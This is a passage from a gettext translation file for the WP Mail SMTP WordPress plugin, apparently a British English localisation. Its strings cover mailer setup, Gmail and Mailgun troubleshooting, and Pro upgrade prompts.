src/Providers/SMTPcom/Mailer.php:451 msgid "Api Key:" msgstr "Api Key:" #: src/Providers/SMTPcom/Mailer.php:453 msgid "Channel:" msgstr "Channel:" #: src/Admin/ConnectionSettings.php:246 msgid "Don't see what you're looking for?" msgstr "Don't see what you're looking for?" #: src/Admin/Area.php:1277 msgid "Go to WP Mail SMTP Settings page" msgstr "Go to WP Mail SMTP Settings page" #: src/SiteHealth.php:137 msgid "License key type" msgstr "Licence key type" #: src/Admin/Area.php:519 msgid "Changes that you made to the settings are not saved!" msgstr "Changes that you made to the settings are not saved!" #: src/SiteHealth.php:241 src/SiteHealth.php:375 msgid "Configure mailer" msgstr "Configure mailer" #: src/SiteHealth.php:198 msgid "Current mailer" msgstr "Current mailer" #: src/Admin/DebugEvents/Event.php:185 src/SiteHealth.php:141 msgid "Debug" msgstr "Debug" #: src/SiteHealth.php:97 msgid "Is WP Mail SMTP mailer setup complete?" msgstr "Is WP Mail SMTP mailer setup complete?" #: src/SiteHealth.php:142 msgid "No debug notices found." msgstr "No debug notices found." #: src/Admin/Pages/AboutTab.php:341 msgid "RafflePress Pro" msgstr "RafflePress Pro" #: src/SiteHealth.php:217 msgid "Test email sending" msgstr "Test email sending" #: src/SiteHealth.php:212 msgid "The WP Mail SMTP plugin mailer setup is complete. You can send a test email, to make sure it's working properly." msgstr "The WP Mail SMTP plugin mailer setup is complete. You can send a test email, to make sure it's working properly." #: src/SiteHealth.php:236 msgid "The WP Mail SMTP plugin mailer setup is incomplete. Please click on the link below to access plugin settings and configure the mailer." msgstr "The WP Mail SMTP plugin mailer setup is incomplete. Please click on the link below to access plugin settings and configure the mailer." #: src/SiteHealth.php:203 msgid "WP Mail SMTP mailer setup is complete" msgstr "WP Mail SMTP mailer setup is complete" #: src/SiteHealth.php:230 msgid "WP Mail SMTP mailer setup is incomplete" msgstr "WP Mail SMTP mailer setup is incomplete" #: src/SiteHealth.php:225 msgid "You currently have the default mailer selected, which means that you haven’t set up SMTP yet." msgstr "You currently have the default mailer selected, which means that you haven’t set up SMTP yet." #: src/Admin/Pages/AboutTab.php:335 msgid "RafflePress" msgstr "RafflePress" #. translators: %1$s - WPForms URL, %2$s - WPBeginner URL, %3$s - OptinMonster #. URL, %4$s - MonsterInsights URL, %5$s - Awesome Motive URL #: src/Admin/Pages/AboutTab.php:85 msgid "WP Mail SMTP is brought to you by the same team that's behind the most user friendly WordPress forms, <a href=\"%1$s\" target=\"_blank\" rel=\"noopener noreferrer\">WPForms</a>, the largest WordPress resource site, <a href=\"%2$s\" target=\"_blank\" rel=\"noopener noreferrer\">WPBeginner</a>, the most popular lead-generation software, <a href=\"%3$s\" target=\"_blank\" rel=\"noopener noreferrer\">OptinMonster</a>, the best WordPress analytics plugin, <a href=\"%4$s\" target=\"_blank\" rel=\"noopener noreferrer\">MonsterInsights</a>, and <a href=\"%5$s\" target=\"_blank\" rel=\"noopener noreferrer\">more</a>." msgstr "WP Mail SMTP is brought to you by the same team that's behind the most user friendly WordPress forms, <a href=\"%1$s\" target=\"_blank\" rel=\"noopener noreferrer\">WPForms</a>, the largest WordPress resource site, <a href=\"%2$s\" target=\"_blank\" rel=\"noopener noreferrer\">WPBeginner</a>, the most popular lead-generation software, <a href=\"%3$s\" target=\"_blank\" rel=\"noopener noreferrer\">OptinMonster</a>, the best WordPress analytics plugin, <a href=\"%4$s\" target=\"_blank\" rel=\"noopener noreferrer\">MonsterInsights</a>, and the most powerful WordPress contest plugin, <a href=\"%5$s\" target=\"_blank\" rel=\"noopener noreferrer\">RafflePress</a>." #: src/Providers/Pepipost/Options.php:25 msgid "Pepipost SMTP" msgstr "Pepipost SMTP" #: src/Admin/ConnectionSettings.php:251 msgid "Suggest a Mailer" msgstr "Suggest a Mailer" #. translators: %1$s - URL to pepipost.com site. #: src/Providers/PepipostAPI/Options.php:32 msgid "<a href=\"%1$s\" target=\"_blank\" rel=\"noopener noreferrer\">Pepipost</a> is a transactional email service. Every month Pepipost delivers over 8 billion emails from 20,000+ customers. Their mission is to reliably send emails in the most efficient way and at the most disruptive pricing ever. Pepipost provides users 30,000 free emails the first 30 days." msgstr "<a href=\"%1$s\" target=\"_blank\" rel=\"noopener noreferrer\">Pepipost</a> is a transactional email service. Every month Pepipost delivers over 8 billion emails from 20,000+ customers. Their mission is to reliably send emails in the most efficient way and at the most disruptive pricing ever. Pepipost provides users 30,000 free emails the first 30 days." #: src/Providers/PepipostAPI/Options.php:117 msgid "Get the API Key" msgstr "Get the API Key" #. translators: %1$s - URL to wpmailsmtp.com doc. #: src/Providers/PepipostAPI/Options.php:35 msgid "Read our <a href=\"%2$s\" target=\"_blank\" rel=\"noopener noreferrer\">Pepipost documentation</a> to learn how to configure Pepipost and improve your email deliverability." msgstr "Read our <a href=\"%2$s\" target=\"_blank\" rel=\"noopener noreferrer\">Pepipost documentation</a> to learn how to configure Pepipost and improve your email deliverability." #: src/Admin/Area.php:654 msgid "Download" msgstr "Download" #. translators: %s - plugin name and its version. #: src/Core.php:474 msgid "<strong>EMAILING DISABLED:</strong> The %s is currently blocking all emails from being sent." msgstr "<strong>EMAILING DISABLED:</strong> The %s is currently blocking all emails from being sent." #: src/Providers/AmazonSES/Options.php:25 msgid "Amazon SES" msgstr "Amazon SES" #. translators: %1$s - constant name; %2$s - constant value. #: src/Core.php:481 msgid "To send emails, change the value of the %1$s constant to %2$s." msgstr "To send emails, change the value of the %1$s constant to %2$s." #. translators: %s - plugin Misc settings page URL. #: src/Core.php:488 msgid "To send emails, go to plugin <a href=\"%s\">Misc settings</a> and disable the \"Do Not Send\" option." msgstr "To send emails, go to plugin <a href=\"%s\">Misc settings</a> and disable the \"Do Not Send\" option." #: src/Providers/AmazonSES/Options.php:39 msgid "We're sorry, the Amazon SES mailer is not available on your plan. Please upgrade to the PRO plan to unlock all these awesome features." msgstr "We're sorry, the Amazon SES mailer is not available on your plan. Please upgrade to the PRO plan to unlock all these awesome features." #: src/Providers/Outlook/Options.php:39 msgid "We're sorry, the Microsoft Outlook mailer is not available on your plan. Please upgrade to the PRO plan to unlock all these awesome features." msgstr "We're sorry, the Microsoft Outlook mailer is not available on your plan. Please upgrade to the PRO plan to unlock all these awesome features." #: src/Admin/Area.php:533 msgid "%name% is a PRO Feature" msgstr "%name% is a PRO Feature" #. Translators: %s - discount value $50. #: src/Admin/Area.php:540 msgid "<strong>Bonus:</strong> WP Mail SMTP users get <span>%s off</span> regular price,<br>applied at checkout." msgstr "<strong>Bonus:</strong> WP Mail SMTP users get <span>$50 off</span> regular price,<br>applied at checkout." #: src/Admin/Area.php:554 src/Admin/SetupWizard.php:258 msgid "Already purchased?" msgstr "Already purchased?" #: src/Admin/Area.php:348 src/Admin/Area.php:349 src/Admin/Area.php:535 #: src/Admin/SetupWizard.php:239 src/Reports/Emails/Summary.php:313 msgid "Upgrade to Pro" msgstr "Upgrade to Pro" #: src/Admin/Pages/MiscTab.php:199 msgid "<strong>This is not recommended</strong> and should only be done for staging or development sites." msgstr "<strong>This is not recommended</strong> and should only be done for staging or development sites." #: src/Admin/Area.php:1241 msgid "Educational notice for this mailer was successfully dismissed." msgstr "Educational notice for this mailer was successfully dismissed." #. translators: %s - filter that was used to disabled. #: src/Admin/Pages/MiscTab.php:190 msgid "Email Delivery Errors were disabled using a %s filter." msgstr "Email Delivery Errors were disabled using a %s filter." #: src/Admin/Pages/MiscTab.php:165 msgid "Hide Email Delivery Errors" msgstr "Hide Email Delivery Errors" #. translators: %s - link to get an API Key. #: src/Providers/PepipostAPI/Options.php:115 #: src/Providers/Sendinblue/Options.php:130 msgid "Follow this link to get an API Key: %s." msgstr "Follow this link to get an API Key: %s." #: src/Providers/Sendinblue/Options.php:132 msgid "Get v3 API Key" msgstr "Get v3 API Key" #: src/Providers/Gmail/Options.php:55 msgid "The Gmail mailer works well for sites that send low numbers of emails. However, Gmail's API has rate limitations and a number of additional restrictions that can lead to challenges during setup.<br><br>If you expect to send a high volume of emails, or if you find that your web host is not compatible with the Gmail API restrictions, then we recommend considering a different mailer option." msgstr "The Gmail mailer works well for sites that send low numbers of emails. However, Gmail's API has rate limitations and a number of additional restrictions that can lead to challenges during setup.<br><br>If you expect to send a high volume of emails, or if you find that your web host is not compatible with the Gmail API restrictions, then we recommend considering a different mailer option." #: src/Providers/OptionsAbstract.php:473 msgid "Meanwhile you can switch to some other mailers." msgstr "Meanwhile you can switch to some other mailers." #. Plugin URI of the plugin #. Author URI of the plugin #: wp_mail_smtp.php msgid "https://wpmailsmtp.com/" msgstr "https://wpmailsmtp.com/" #: src/Providers/Gmail/Auth.php:257 msgid "There was an error while processing the Google authentication request. Please make sure that you have Client ID and Client Secret both valid and saved." msgstr "There was an error while processing the Google authentication request. Please make sure that you have Client ID and Client Secret both valid and saved." #: assets/languages/wp-mail-smtp-vue.php:789 src/Admin/Area.php:190 msgid "You have successfully linked the current site with your Google API project. Now you can start sending emails through Gmail." msgstr "You have successfully linked the current site with your Google API project. Now you can start sending emails through Gmail." #: src/Admin/Area.php:645 src/Admin/Area.php:653 #: src/Admin/Pages/AboutTab.php:233 src/Connect.php:55 msgid "Activate" msgstr "Activate" #. translators: %1$s - WPBeginner URL for recommended WordPress hosting. #: wp_mail_smtp.php:197 msgid "Your site is running an <strong>insecure version</strong> of PHP that is no longer supported. Please contact your web hosting provider to update your PHP version or switch to a <a href=\"%1$s\" target=\"_blank\" rel=\"noopener noreferrer\">recommended WordPress hosting company</a>." msgstr "Your site is running an <strong>insecure version</strong> of PHP that is no longer supported. Please contact your web hosting provider to update your PHP version or switch to a <a href=\"%1$s\" target=\"_blank\" rel=\"noopener noreferrer\">recommended WordPress hosting company</a>." #. translators: %s - WPMailSMTP.com docs URL with more details. #: wp_mail_smtp.php:225 msgid "<strong>WP Mail SMTP plugin is disabled</strong> on your site until you fix the issue. <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">Read more for additional information.</a>" msgstr "<strong>WP Mail SMTP plugin is disabled</strong> on your site until you fix the issue. <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">Read more for additional information.</a>" #: src/Admin/Area.php:1175 msgid "WP Mail SMTP Pro related message was successfully dismissed." msgstr "WP Mail SMTP Pro related message was successfully dismissed." #: src/Admin/Area.php:652 msgid "Install and Activate" msgstr "Install and Activate" #: src/Admin/Area.php:651 msgid "Could not install a plugin. Please download from WordPress.org and install manually." msgstr "Could not install a plugin. Please download from WordPress.org and install manually." #. translators: %s - WPMailSMTP.com URL. #: src/Admin/Pages/SettingsTab.php:282 msgid "<a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">Get WP Mail SMTP Pro Today and Unlock all the Powerful Features »</a>" msgstr "<a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">Get WP Mail SMTP Pro Today and Unlock all the Powerful Features »</a>" #: src/Admin/Pages/SettingsTab.php:274 msgid "Test and verify email delivery" msgstr "Test and verify email delivery" #: src/Admin/Pages/SettingsTab.php:273 msgid "Set up domain name verification (DNS)" msgstr "Set up domain name verification (DNS)" #: src/Admin/Pages/SettingsTab.php:270 msgid "White Glove Setup - sit back and relax while we handle everything for you" msgstr "White Glove Setup - sit back and relax while we handle everything for you" #: src/Admin/Pages/SettingsTab.php:267 msgid "Access to our world class support team" msgstr "Access to our world class support team" #: src/Admin/Pages/SettingsTab.php:262 msgid "Amazon SES - harness the power of AWS" msgstr "Amazon SES - harness the power of AWS" #: src/Admin/Pages/SettingsTab.php:258 msgid "Email Logging - keep track of every email sent from your site" msgstr "Email Logging - keep track of every email sent from your site" #: src/Admin/Pages/SettingsTab.php:266 msgid "Manage Notifications - control which emails your site sends" msgstr "Manage Notifications - control which emails your site sends" #: src/Admin/Pages/SettingsTab.php:254 msgid "Pro Features:" msgstr "Pro Features:" #: src/Admin/Pages/SettingsTab.php:247 msgid "Thanks for being a loyal WP Mail SMTP user. Upgrade to WP Mail SMTP Pro to unlock more awesome features and experience why WP Mail SMTP is the most popular SMTP plugin." msgstr "Thanks for being a loyal WP Mail SMTP user. Upgrade to WP Mail SMTP Pro to unlock more awesome features and experience why WP Mail SMTP is the most popular SMTP plugin." #: src/Admin/Pages/SettingsTab.php:243 msgid "Get WP Mail SMTP Pro and Unlock all the Powerful Features" msgstr "Get WP Mail SMTP Pro and Unlock all the Powerful Features" #: src/Admin/Area.php:649 msgid "Processing..." msgstr "Processing…" #: src/Admin/Pages/SettingsTab.php:141 msgid "You're using WP Mail SMTP Lite - no license needed. Enjoy!" msgstr "You're using WP Mail SMTP Lite - no licence needed. Enjoy!" #: src/Admin/Pages/SettingsTab.php:75 msgid "License Key" msgstr "Licence Key" #: src/Admin/Pages/SettingsTab.php:67 msgid "Your license key provides access to updates and support." msgstr "Your licence key provides access to updates and support." #: src/Admin/Pages/SettingsTab.php:64 msgid "License" msgstr "Licence" #. Translators: %s - discount value $50. #: src/Admin/Pages/SettingsTab.php:301 msgid "<strong>Bonus:</strong> WP Mail SMTP users get <span class=\"price-off\">%s off regular price</span>, automatically applied at checkout." msgstr "<strong>Bonus:</strong> WP Mail SMTP users get <span class=\"price-off\">$50 off regular price</span>, automatically applied at checkout." #. Translators: %s - discount value $50 #: src/Admin/Pages/SettingsTab.php:167 msgid "As a valued WP Mail SMTP Lite user you receive <strong>%s off</strong>, automatically applied at checkout!" msgstr "As a valued WP Mail SMTP Lite user you receive <strong>$50 off</strong>, automatically applied at checkout!" #: src/Admin/Pages/TestTab.php:1505 msgid "Additionally, you can take advantage of our White Glove Setup. Sit back and relax while we handle everything for you! If you simply don't have time or maybe you feel a bit in over your head - we got you covered." msgstr "Additionally, you can take advantage of our White Glove Setup. Sit back and relax while we handle everything for you! If you simply don't have time or maybe you feel a bit in over your head - we got you covered." #. translators: %s - WPMailSMTP.com URL. #: src/Admin/Pages/TestTab.php:1490 msgid "To access our world class support, please <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">upgrade to WP Mail SMTP Pro</a>. Along with getting expert support, you will also get Notification controls, Email Logging, and integrations for Amazon SES, Office 365, and Outlook.com." msgstr "To access our world class support, please <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">upgrade to WP Mail SMTP Pro</a>. Along with getting expert support, you will also get Notification controls, Email Logging, and integrations for Amazon SES, Office 365, and Outlook.com." #. Translators: %s - discount value $50 #: src/Admin/Pages/TestTab.php:1512 msgid "As a valued WP Mail SMTP user, you will get <span class=\"price-off\">%s off regular pricing</span>, automatically applied at checkout!" msgstr "As a valued WP Mail SMTP user, you will get <span class=\"price-off\">$50 off regular pricing</span>, automatically applied at checkout!" #: src/Admin/Pages/TestTab.php:956 msgid "If you do not see activation email, go to your Mailgun control panel and resend the activation email." msgstr "If you do not see activation email, go to your Mailgun control panel and resend the activation email." #: src/Admin/Pages/TestTab.php:952 msgid "It seems that you forgot to activate your Mailgun account." msgstr "It seems that you forgot to activate your Mailgun account." #: src/Admin/Pages/TestTab.php:164 msgid "Enter email address where test email will be sent." msgstr "Enter email address where test email will be sent." #: src/Admin/Pages/VersusTab.php:263 msgid "Priority Support" msgstr "Priority Support" #: src/Admin/Pages/VersusTab.php:257 msgid "Limited Support" msgstr "Limited Support" #: src/Admin/Pages/VersusTab.php:221 msgid "Complete Email Controls management for most default WordPress emails" msgstr "Complete Email Controls management for most default WordPress emails" #: src/Admin/Pages/VersusTab.php:215 msgid "No controls over whether default WordPress emails are sent" msgstr "No controls over whether default WordPress emails are sent" #: src/Admin/Pages/VersusTab.php:201 msgid "Emails are not logged" msgstr "Emails are not logged" #: src/Admin/Pages/VersusTab.php:180 msgid "Customer Support" msgstr "Customer Support" #: src/Admin/Pages/ControlTab.php:35 src/Admin/Pages/ControlTab.php:237 #: src/Admin/Pages/VersusTab.php:177 msgid "Email Controls" msgstr "Email Controls" #: src/Admin/Pages/VersusTab.php:140 msgid "Get WP Mail SMTP Pro Today and Unlock all of these Powerful Features" msgstr "Get WP Mail SMTP Pro Today and Unlock all of these Powerful Features" #: src/Admin/Pages/VersusTab.php:99 msgid "Pro" msgstr "Pro" #: src/Admin/Pages/VersusTab.php:89 msgid "Feature" msgstr "Feature" #: src/Admin/Pages/VersusTab.php:80 msgid "Get the most out of WP Mail SMTP by upgrading to Pro and unlocking all of the powerful features." msgstr "Get the most out of WP Mail SMTP by upgrading to Pro and unlocking all of the powerful features." #: src/Admin/Pages/AboutTab.php:666 msgid "Plugin installed." msgstr "Plugin installed." #: src/Admin/Pages/AboutTab.php:658 src/Connect.php:210 src/Connect.php:218 #: src/Connect.php:297 msgid "Plugin installed & activated." msgstr "Plugin installed & activated." #: src/Admin/Pages/AboutTab.php:577 msgid "Could not install the plugin." msgstr "Could not install the plugin." #: src/Admin/Pages/AboutTab.php:561 msgid "Plugin activated." msgstr "Plugin activated." #: src/Admin/Pages/AboutTab.php:529 msgid "Could not activate the plugin. Please activate it from the Plugins page." msgstr "Could not activate the plugin. Please activate it from the Plugins page." #: src/Admin/Pages/AboutTab.php:285 msgid "WPForms Pro" msgstr "WPForms Pro" #: src/Admin/SetupWizard.php:1053 msgid "Contact Forms by WPForms" msgstr "Contact Forms by WPForms" #: src/Admin/Pages/AboutTab.php:272 msgid "OptinMonster" msgstr "OptinMonster" #: src/Admin/Pages/AboutTab.php:299 msgid "MonsterInsights Pro" msgstr "MonsterInsights Pro" #: src/Admin/Pages/AboutTab.php:293 msgid "MonsterInsights" msgstr "MonsterInsights" #: src/Admin/Area.php:648 src/Admin/Pages/AboutTab.php:230 msgid "Inactive" msgstr "Inactive" #. translators: %s - status HTML text. #: src/Admin/Pages/AboutTab.php:175 msgid "Status: %s" msgstr "Status: %s" #: src/Admin/Pages/AboutTab.php:112 msgid "The WPForms Team" msgstr "The WPForms Team" #: src/Admin/Pages/AboutTab.php:110 msgid "The WPForms Team photo" msgstr "The WPForms Team photo" #: src/Admin/Pages/AboutTab.php:104 msgid "Yup, we know a thing or two about building awesome products that customers love." msgstr "Yup, we know a thing or two about building awesome products that customers love." #: src/Admin/Pages/TestTab.php:955 msgid "Check your inbox you used to create a Mailgun account. Click the activation link in an email from Mailgun." msgstr "Check your inbox you used to create a Mailgun account. Click the activation link in an email from Mailgun." #. Translators: %s - discount value $50. #: src/Admin/Pages/VersusTab.php:148 msgid "Bonus: WP Mail SMTP Lite users get <span class=\"price-off\">%s off regular price</span>, automatically applied at checkout." msgstr "Bonus: WP Mail SMTP Lite users get <span class=\"price-off\">$50 off regular price</span>, automatically applied at checkout." #: src/Admin/Pages/AboutTab.php:78 msgid "Our goal is to make reliable email deliverability easy for WordPress." msgstr "Our goal is to make reliable email deliverability easy for WordPress." #: src/Admin/Pages/AboutTab.php:75 msgid "Email deliverability has been a well-documented problem for all WordPress websites. However as WPForms grew, we became more aware of this painful issue that affects our users and the larger WordPress community. So we decided to solve this problem and make a solution that's beginner friendly." msgstr "Email deliverability has been a well-documented problem for all WordPress websites. However as WPForms grew, we became more aware of this painful issue that affects our users and the larger WordPress community. So we decided to solve this problem and make a solution that's beginner friendly." #: src/Admin/Pages/AboutTab.php:71 msgid "Hello and welcome to WP Mail SMTP, the easiest and most popular WordPress SMTP plugin. We build software that helps your site reliably deliver emails every time." msgstr "Hello and welcome to WP Mail SMTP, the easiest and most popular WordPress SMTP plugin. We build software that helps your site reliably deliver emails every time." #: src/Admin/Pages/About.php:50 src/Admin/Pages/AboutTab.php:44 msgid "About Us" msgstr "About Us" #. translators: %s - plugin current license type. #: src/Admin/Pages/VersusTab.php:72 msgid "%s vs Pro" msgstr "%s vs Pro" #: src/Admin/Area.php:327 src/Admin/Area.php:328 src/Admin/Pages/Logs.php:48 #: src/Admin/Pages/LogsTab.php:51 src/Admin/Pages/LogsTab.php:143 #: src/Admin/Pages/VersusTab.php:176 msgid "Email Log" msgstr "Email Log" #. translators: %1$s - date, \a\t - specially escaped "at", %2$s - time. #: src/WP.php:205 msgid "%1$s \\a\\t %2$s" msgstr "%1$s \\a\\t %2$s" #: src/Providers/Gmail/Options.php:253 msgid "You need to save settings with Client ID and Client Secret before you can proceed." msgstr "You need to save settings with Client ID and Client Secret before you can proceed." #. translators: %s - email address, as received from Google API. #: src/Providers/Gmail/Options.php:218 msgid "Connected as %s" msgstr "Connected as %s" #: src/Providers/Gmail/Options.php:163 msgid "Please copy this URL into the \"Authorized redirect URIs\" field of your Google web application." msgstr "Please copy this URL into the \"Authorized redirect URIs\" field of your Google web application." #: src/Admin/Area.php:437 src/Admin/Area.php:1270 #: src/Admin/DashboardWidget.php:274 src/Admin/FlyoutMenu.php:100 #: src/Admin/Pages/AdditionalConnectionsTab.php:115 #: src/Admin/Pages/AdditionalConnectionsTab.php:125 #: src/Admin/Pages/AlertsTab.php:90 src/Admin/Pages/AlertsTab.php:297 #: src/Admin/Pages/ControlTab.php:246 src/Admin/Pages/ControlTab.php:299 #: src/Admin/Pages/EmailReportsTab.php:137 #: src/Admin/Pages/EmailReportsTab.php:175 src/Admin/Pages/ExportTab.php:89 #: src/Admin/Pages/ExportTab.php:146 src/Admin/Pages/LogsTab.php:152 #: src/Admin/Pages/LogsTab.php:190 src/Admin/Pages/SmartRoutingTab.php:111 #: src/Admin/Pages/SmartRoutingTab.php:308 msgid "Upgrade to WP Mail SMTP Pro" msgstr "Upgrade to WP Mail SMTP Pro" #. translators: %1$s - constant that was used; %2$s - file where it was used. #: src/Options.php:1538 msgid "The value of this field was set using a constant %1$s most likely inside %2$s of your WordPress installation." msgstr "The value of this field was set using a constant %1$s most likely inside %2$s of your WordPress installation." #: src/Providers/OptionsAbstract.php:380 msgid "All the defined constants will stop working and you will be able to change all the values on this page." msgstr "All the defined constants will stop working and you will be able to change all the values on this page." #. translators: %1$s - wp-config.php file, %2$s - WPMS_ON constant name. #: src/Providers/OptionsAbstract.php:370 msgid "If you want to disable the use of constants, find in %1$s file the constant %2$s and turn if off:" msgstr "If you want to disable the use of constants, find in %1$s file the constant %2$s and turn if off:" #. translators: %s - constant name: WPMS_SMTP_PASS. #: src/Providers/OptionsAbstract.php:362 msgid "To change the password you need to change the value of the constant there: %s" msgstr "To change the password you need to change the value of the constant there: %s" #: wp_mail_smtp.php:169 msgid "Please deactivate the free version of the WP Mail SMTP plugin before activating WP Mail SMTP Pro." msgstr "Please deactivate the free version of the WP Mail SMTP plugin before activating WP Mail SMTP Pro." #: src/Admin/Pages/TestTab.php:749 src/Admin/Pages/TestTab.php:791 #: src/Admin/Pages/TestTab.php:907 msgid "This means your web server was unable to connect to the host server." msgstr "This means your web server was unable to connect to the host server." #: assets/languages/wp-mail-smtp-vue.php:884 msgid "Install" msgstr "Install" #: src/Admin/Pages/ExportTab.php:121 msgid "Status" msgstr "Status" #: src/SiteHealth.php:133 msgid "Version" msgstr "Version" #: src/Admin/DebugEvents/Event.php:360 src/Admin/DebugEvents/Table.php:170 msgid "Type" msgstr "Type" #: src/Admin/DebugEvents/Event.php:375 src/Admin/DebugEvents/Table.php:172 #: src/Admin/Pages/ExportTab.php:128 msgid "Source" msgstr "Source" #: src/Admin/Area.php:647 src/Admin/Pages/AboutTab.php:222 msgid "Active" msgstr "Active" #: src/Admin/Pages/AboutTab.php:241 msgid "Not Installed" msgstr "Not Installed" #: src/Admin/ConnectionSettings.php:279 msgid "Dismiss this notice" msgstr "Dismiss this notice" #: assets/languages/wp-mail-smtp-vue.php:460 #: src/Providers/Gmail/Options.php:172 msgid "Authorization" msgstr "Authorization" #. translators: %s - plugin admin page URL. #: src/Core.php:556 msgid "Please review your WP Mail SMTP settings in <a href=\"%s\">plugin admin area</a>." msgstr "Please review your WP Mail SMTP settings in <a href=\"%s\">plugin admin area</a>." #: src/Admin/Pages/TestTab.php:1457 msgid "Need support?" msgstr "Need support?" #: src/Admin/Pages/TestTab.php:1449 msgid "Recommended next steps:" msgstr "Recommended next steps:" #: src/Admin/Pages/TestTab.php:1394 msgid "Try using a different mailer." msgstr "Try using a different mailer." #: src/Admin/Pages/TestTab.php:1388 msgid "Contact your web hosting provider and ask them to verify your server can make outside connections. Additionally, ask them if a firewall or security policy may be preventing the connection - many shared hosts block certain ports.<br><strong>Note: this is the most common cause of this issue.</strong>" msgstr "Contact your web hosting provider and ask them to verify your server can make outside connections. Additionally, ask them if a firewall or security policy may be preventing the connection - many shared hosts block certain ports.<br><strong>Note: this is the most common cause of this issue.</strong>" #: src/Admin/Pages/TestTab.php:1381 msgid "Your host is rejecting the connection." msgstr "Your host is rejecting the connection." #: src/Admin/Pages/TestTab.php:1375 msgid "Plugin settings are incorrect (wrong SMTP settings, invalid Mailer configuration, etc)." msgstr "Plugin settings are incorrect (wrong SMTP settings, invalid Mailer configuration, etc)." #: src/Admin/Pages/TestTab.php:1371 msgid "This means your test email was unable to be sent." msgstr "This means your test email was unable to be sent." #: src/Admin/Pages/TestTab.php:1369 msgid "An issue was detected." msgstr "An issue was detected." #: src/Admin/Pages/TestTab.php:1231 msgid "Try to use a separate project for your emails, so the project has only 1 Gmail API in it enabled. You will need to remove the old project and create a new one from scratch." msgstr "Try to use a separate project for your emails, so the project has only 1 Gmail API in it enabled. You will need to remove the old project and create a new one from scratch." #: src/Admin/Pages/TestTab.php:1227 msgid "You may have added a new API to a project" msgstr "You may have added a new API to a project" #. translators: %s - Gmail documentation URL. #: src/Admin/Pages/TestTab.php:1205 msgid "Please follow our <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">Gmail tutorial</a> to be sure that all the correct project and data is applied." msgstr "Please follow our <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">Gmail tutorial</a> to be sure that all the correct project and data is applied." #: src/Admin/Pages/TestTab.php:1202 src/Admin/Pages/TestTab.php:1230 msgid "Make sure that the used Client ID/Secret correspond to a proper project that has Gmail API enabled." msgstr "Make sure that the used Client ID/Secret correspond to a proper project that has Gmail API enabled." #. translators: %s - Google Developers Console URL. #: src/Admin/Pages/TestTab.php:1180 msgid "Make sure that you have Gmail API enabled, and you can do that <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">here</a>." msgstr "Make sure that you have Gmail API enabled, and you can do that <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">here</a>." #: src/Admin/Pages/TestTab.php:1149 msgid "There are various reasons for that, please review the steps below." msgstr "There are various reasons for that, please review the steps below." #: src/Admin/Pages/TestTab.php:1138 msgid "Make sure there is no aggressive caching on site admin area pages or try to clean cache between attempts." msgstr "Make sure there is no aggressive caching on site admin area pages or try to clean cache between attempts." #: src/Admin/Pages/TestTab.php:1137 msgid "Reinstall the plugin with clean plugin data turned on on Misc page. This will remove all the plugin options and you will be safe to retry." msgstr "Reinstall the plugin with clean plugin data turned on on Misc page. This will remove all the plugin options and you will be safe to retry." #: src/Admin/Pages/TestTab.php:1136 msgid "Make sure that you are not trying to manually clean up the plugin options to retry the \"Allow...\" step." msgstr "Make sure that you are not trying to manually clean up the plugin options to retry the \"Allow...\" step." #: src/Admin/Pages/TestTab.php:1133 msgid "Authentication code that Google returned to you has already been used on your previous auth attempt." msgstr "Authentication code that Google returned to you has already been used on your previous auth attempt." #: src/Admin/Pages/TestTab.php:1105 msgid "Unfortunately, this error can be due to many different reasons." msgstr "Unfortunately, this error can be due to many different reasons." #: src/Admin/Pages/TestTab.php:1094 msgid "Make sure that the generated email has a TO header, useful when you are responsible for email creation." msgstr "Make sure that the generated email has a TO header, useful when you are responsible for email creation." #. translators: 1 - correct email address example. 2 - incorrect email address #. example. #: src/Admin/Pages/TestTab.php:1090 msgid "It should be something like this: %1$s. These are incorrect values: %2$s." msgstr "It should be something like this: %1$s. These are incorrect values: %2$s." #: src/Admin/Pages/TestTab.php:1088 msgid "Check the \"Send To\" email address used and confirm it is a valid email and was not empty." msgstr "Check the \"Send To\" email address used and confirm it is a valid email and was not empty." #. translators: %s - Google support article URL. #: src/Admin/Pages/TestTab.php:1047 msgid "if you are using regular Gmail account, please <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">read this article</a> to proceed." msgstr "if you are using regular Gmail account, please <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">read this article</a> to proceed." #: src/Admin/Pages/TestTab.php:1042 msgid "Please click \"Agree\", if you see that button. If not - you will need to enable less secure apps first:" msgstr "Please click \"Agree\", if you see that button. If not - you will need to enable less secure apps first:" #: src/Admin/Pages/TestTab.php:1041 msgid "After the click you should be redirected to a Gmail authorization screen, where you will be asked a permission to send emails on your behalf." msgstr "After the click you should be redirected to a Gmail authorization screen, where you will be asked a permission to send emails on your behalf." #: src/Admin/Pages/TestTab.php:1040 msgid "Go to plugin Settings page and click the \"Allow plugin to send emails using your Google account\" button." msgstr "Go to plugin Settings page and click the \"Allow plugin to send emails using your Google account\" button." #: src/Admin/Pages/TestTab.php:1037 msgid "Make sure that you have clicked the \"Allow plugin to send emails using your Google account\" button under Gmail settings." msgstr "Make sure that you have clicked the \"Allow plugin to send emails using your Google account\" button under Gmail settings." #: src/Admin/Pages/TestTab.php:1036 msgid "You have not properly configured Gmail mailer." msgstr "You have not properly configured Gmail mailer." #: src/Admin/Pages/TestTab.php:1034 src/Admin/Pages/TestTab.php:1083 #: src/Admin/Pages/TestTab.php:1103 src/Admin/Pages/TestTab.php:1131 #: src/Admin/Pages/TestTab.php:1147 src/Admin/Pages/TestTab.php:1199 #: src/Admin/Pages/TestTab.php:1225 msgid "Google API Error." msgstr "Google API Error." #: src/Admin/Pages/TestTab.php:1025 msgid "Complete the steps in section \"2. Verify Your Domain\"." msgstr "Complete the steps in section \"2. Verify Your Domain\"." #. translators: %s - Mailgun documentation URL. #: src/Admin/Pages/TestTab.php:1013 msgid "Go to our how-to guide for setting up <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">Mailgun with WP Mail SMTP</a>." msgstr "Go to 